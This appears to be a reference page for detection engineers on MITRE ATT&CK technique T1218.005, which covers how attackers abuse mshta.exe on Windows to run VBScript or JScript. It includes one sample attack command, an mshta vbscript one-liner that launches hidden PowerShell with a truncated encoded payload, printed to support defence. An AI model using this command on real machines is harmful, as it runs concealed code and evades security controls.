T1218.005Tactic: Defense EvasionOfficial MITRE ATT&CK Page

T1218.005: Mshta

Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and inline VBScript or JScript.

Total Capable Binaries: 1
Windows: 1
Linux: 0
macOS: 0

Living-off-the-Land Matrix for T1218.005

Across 1 verified binaries
Windows2 payloads

mshta.exe

Microsoft HTML Application (MSHTA) host executes .hta files and scripts embedded inside web pages. Attackers abuse mshta to execute malicious inline VBScript or JScript directly from the command line or remote HTTP servers.

Sample Attack Vector:
mshta.exe vbscript:Close(Execute("CreateObject(""WScript.Shell"").Run ""powershell.exe -nop -w hidden -enc JAB...="",0"))
Sharon Ben Moshe
Curated & Verified by
Sharon Ben Moshe
Cybersecurity Researcher & Detection EngineerCheck Point